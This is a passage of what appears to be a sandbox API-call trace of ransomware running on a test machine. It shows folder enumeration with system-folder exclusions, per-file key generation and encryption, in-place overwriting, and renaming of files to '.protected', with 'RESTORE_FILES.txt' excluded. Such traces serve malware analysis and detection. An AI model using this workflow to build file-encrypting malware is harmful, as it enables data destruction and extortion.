uWAaJ3_mKsP3PC.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\3ib5l uwaaj3_mksp3pc.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\3ib5L uWAaJ3_mKsP3PC.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\3ib5l uwaaj3_mksp3pc.mp3.protected")) returned 1 [0092.264] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.264] lstrcmpiW (lpString1="4iswZr.wav", lpString2="Windows") returned -1 [0092.264] lstrcmpiW (lpString1="4iswZr.wav", lpString2="Program Files") returned -1 [0092.264] lstrcmpiW (lpString1="4iswZr.wav", lpString2="Program Files (x86)") returned -1 [0092.264] lstrcmpiW (lpString1="4iswZr.wav", lpString2="$Recycle.bin") returned 1 [0092.264] lstrcmpiW (lpString1="4iswZr.wav", lpString2="System Volume Information") returned -1 [0092.264] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\4iswZr.wav") returned 68 [0092.264] StrStrIW (lpFirst="4iswZr.wav", lpSrch=".protected") returned 0x0 [0092.264] lstrcmpW (lpString1="4iswZr.wav", lpString2="RESTORE_FILES.txt") returned -1 [0092.264] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.264] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.264] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\4iswZr.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\4iswzr.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.265] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\4iswZr.wav") returned 68 [0092.265] StrStrW (lpFirst="4iswZr.wav", lpSrch=".txt") returned 0x0 [0092.265] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\4iswZr.wav") returned 68 [0092.265] StrStrW (lpFirst="4iswZr.wav", lpSrch=".rar") returned 0x0 [0092.265] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\4iswZr.wav") returned 68 [0092.265] StrStrW (lpFirst="4iswZr.wav", lpSrch=".zip") returned 0x0 [0092.265] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.266] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.266] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.266] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.267] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.267] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.267] CloseHandle (hObject=0xd4) returned 1 [0092.267] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\4iswZr.wav.protected") returned 78 [0092.267] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\4iswZr.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\4iswzr.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\4iswZr.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\4iswzr.wav.protected")) returned 1 [0092.268] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.268] lstrcmpiW (lpString1="9_XPjfSRV64J4HD8ZUA.wav", lpString2="Windows") returned -1 [0092.268] lstrcmpiW (lpString1="9_XPjfSRV64J4HD8ZUA.wav", lpString2="Program Files") returned -1 [0092.268] lstrcmpiW (lpString1="9_XPjfSRV64J4HD8ZUA.wav", lpString2="Program Files (x86)") returned -1 [0092.268] lstrcmpiW (lpString1="9_XPjfSRV64J4HD8ZUA.wav", lpString2="$Recycle.bin") returned 1 [0092.268] lstrcmpiW (lpString1="9_XPjfSRV64J4HD8ZUA.wav", lpString2="System Volume Information") returned -1 [0092.268] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\9_XPjfSRV64J4HD8ZUA.wav") returned 81 [0092.268] StrStrIW (lpFirst="9_XPjfSRV64J4HD8ZUA.wav", lpSrch=".protected") returned 0x0 [0092.268] lstrcmpW (lpString1="9_XPjfSRV64J4HD8ZUA.wav", lpString2="RESTORE_FILES.txt") returned -1 [0092.268] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.268] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.268] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\9_XPjfSRV64J4HD8ZUA.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\9_xpjfsrv64j4hd8zua.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.269] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\9_XPjfSRV64J4HD8ZUA.wav") returned 81 [0092.269] StrStrW (lpFirst="9_XPjfSRV64J4HD8ZUA.wav", lpSrch=".txt") returned 0x0 [0092.269] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\9_XPjfSRV64J4HD8ZUA.wav") returned 81 [0092.269] StrStrW (lpFirst="9_XPjfSRV64J4HD8ZUA.wav", lpSrch=".rar") returned 0x0 [0092.269] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\9_XPjfSRV64J4HD8ZUA.wav") returned 81 [0092.269] StrStrW (lpFirst="9_XPjfSRV64J4HD8ZUA.wav", lpSrch=".zip") returned 0x0 [0092.269] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.270] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.270] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.270] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.270] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.271] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.271] CloseHandle (hObject=0xd4) returned 1 [0092.271] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\9_XPjfSRV64J4HD8ZUA.wav.protected") returned 91 [0092.271] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\9_XPjfSRV64J4HD8ZUA.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\9_xpjfsrv64j4hd8zua.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\9_XPjfSRV64J4HD8ZUA.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\9_xpjfsrv64j4hd8zua.wav.protected")) returned 1 [0092.272] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.272] lstrcmpiW (lpString1="J6s22iFW9.mp3", lpString2="Windows") returned -1 [0092.272] lstrcmpiW (lpString1="J6s22iFW9.mp3", lpString2="Program Files") returned -1 [0092.272] lstrcmpiW (lpString1="J6s22iFW9.mp3", lpString2="Program Files (x86)") returned -1 [0092.272] lstrcmpiW (lpString1="J6s22iFW9.mp3", lpString2="$Recycle.bin") returned 1 [0092.272] lstrcmpiW (lpString1="J6s22iFW9.mp3", lpString2="System Volume Information") returned -1 [0092.272] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\J6s22iFW9.mp3") returned 71 [0092.272] StrStrIW (lpFirst="J6s22iFW9.mp3", lpSrch=".protected") returned 0x0 [0092.272] lstrcmpW (lpString1="J6s22iFW9.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0092.272] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.272] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.272] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\J6s22iFW9.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\j6s22ifw9.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.273] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\J6s22iFW9.mp3") returned 71 [0092.273] StrStrW (lpFirst="J6s22iFW9.mp3", lpSrch=".txt") returned 0x0 [0092.273] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\J6s22iFW9.mp3") returned 71 [0092.273] StrStrW (lpFirst="J6s22iFW9.mp3", lpSrch=".rar") returned 0x0 [0092.273] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\J6s22iFW9.mp3") returned 71 [0092.273] StrStrW (lpFirst="J6s22iFW9.mp3", lpSrch=".zip") returned 0x0 [0092.273] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2172, lpOverlapped=0x0) returned 1 [0092.273] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffde8e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.274] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2172, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2172, lpOverlapped=0x0) returned 1 [0092.274] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.274] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.274] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.274] CloseHandle (hObject=0xd4) returned 1 [0092.275] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\J6s22iFW9.mp3.protected") returned 81 [0092.275] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\J6s22iFW9.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\j6s22ifw9.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\J6s22iFW9.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\j6s22ifw9.mp3.protected")) returned 1 [0092.278] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.278] lstrcmpiW (lpString1="MPxby.mp3", lpString2="Windows") returned -1 [0092.278] lstrcmpiW (lpString1="MPxby.mp3", lpString2="Program Files") returned -1 [0092.278] lstrcmpiW (lpString1="MPxby.mp3", lpString2="Program Files (x86)") returned -1 [0092.278] lstrcmpiW (lpString1="MPxby.mp3", lpString2="$Recycle.bin") returned 1 [0092.278] lstrcmpiW (lpString1="MPxby.mp3", lpString2="System Volume Information") returned -1 [0092.278] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\MPxby.mp3") returned 67 [0092.278] StrStrIW (lpFirst="MPxby.mp3", lpSrch=".protected") returned 0x0 [0092.278] lstrcmpW (lpString1="MPxby.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0092.278] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0092.278] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0092.278] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\MPxby.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\mpxby.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0092.279] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\MPxby.mp3") returned 67 [0092.279] StrStrW (lpFirst="MPxby.mp3", lpSrch=".txt") returned 0x0 [0092.279] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\MPxby.mp3") returned 67 [0092.279] StrStrW (lpFirst="MPxby.mp3", lpSrch=".rar") returned 0x0 [0092.279] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\MPxby.mp3") returned 67 [0092.279] StrStrW (lpFirst="MPxby.mp3", lpSrch=".zip") returned 0x0 [0092.279] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.279] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.279] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0092.280] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.280] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0092.280] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0092.280] CloseHandle (hObject=0xd4) returned 1 [0092.281] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\MPxby.mp3.protected") returned 77 [0092.281] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\MPxby.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\mpxby.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\MPxby.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\mpxby.mp3.protected")) returned 1 [0092.281] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0092.282] lstrcmpiW (lpString1="OqvzO1sqQ41zXf", lpString2="Windows") returned -1 [0092.282] lstrcmpiW (lpString1="OqvzO1sqQ41zXf", lpString2="Program Files") returned -1 [0092.282] lstrcmpiW (lpString1="OqvzO1sqQ41zXf", lpString2="Program Files (x86)") returned -1 [0092.282] lstrcmpiW (lpString1="OqvzO1sqQ41zXf", lpString2="$Recycle.bin") returned 1 [0092.282] lstrcmpiW (lpString1="OqvzO1sqQ41zXf", lpString2="System Volume Information") returned -1 [0092.282] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf") returned 72 [0092.282] lstrcmpW (lpString1="OqvzO1sqQ41zXf", lpString2=".") returned 1 [0092.282] lstrcmpW (lpString1="OqvzO1sqQ41zXf", lpString2="..") returned 1 [0092.282] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\*") returned 74 [0092.282] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0092.282] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0092.282] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0092.282] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0092.282] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0092.282] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0092.282] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\.") returned 74 [0092.282] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0092.282] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.282] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0092.282] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0092.282] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0092.282] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0092.282] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0092.282] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\..") returned 75 [0092.282] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0092.283] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0092.283] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0092.283] lstrcmpiW (lpString1="7xBQXzq dcX.wav", lpString2="Windows") returned -1 [0092.283] lstrcmpiW (lpString1="7xBQXzq dcX.wav", lpString2="Program Files") returned -1 [0092.283] lstrcmpiW (lpString1="7xBQXzq dcX.wav", lpString2="Program Files (x86)") returned -1 [0092.283] lstrcmpiW (lpString1="7xBQXzq dcX.wav", lpString2="$Recycle.bin") returned 1 [0092.283] lstrcmpiW (lpString1="7xBQXzq dcX.wav", lpString2="System Volume Information") returned -1 [0092.283] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\7xBQXzq dcX.wav") returned 88 [0092.283] StrStrIW (lpFirst="7xBQXzq dcX.wav", lpSrch=".protected") returned 0x0 [0092.283] lstrcmpW (lpString1="7xBQXzq dcX.wav", lpString2="RESTORE_FILES.txt") returned -1 [0092.283] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0092.283] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0092.283] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\7xBQXzq dcX.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\kbpzp-b4rdx-rknrq\\oqvzo1sqq41zxf\\7xbqxzq dcx.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0092.283] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\7xBQXzq dcX.wav") returned 88 [0092.283] StrStrW (lpFirst="7xBQXzq dcX.wav", lpSrch=".txt") returned 0x0 [0092.283] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\7xBQXzq dcX.wav") returned 88 [0092.283] StrStrW (lpFirst="7xBQXzq dcX.wav", lpSrch=".rar") returned 0x0 [0092.283] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\kBpzP-b4RDX-RknRQ\\OqvzO1sqQ41zXf\\7xBQXzq dcX.wav") returned 88 [0092.283] StrStrW (lpFirst="7xBQXzq dcX.wav", lpSrch=".zip") returned 0x0 [0092.284] ReadFile (in: hFile=0xd8, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295ec94*=0x2054, lpOverlapped=0x0) returned 1 [0092.284] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffdfac, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0092.284] WriteFile (in: hFile=0xd8, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x2054, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295ec94*=0x2054, lpOverlapped=0x0) returned 1 [0092.284] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0092.284] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0092.284] WriteFile (in: hFile=0xd8, lpBuffer=0x48ea38*, 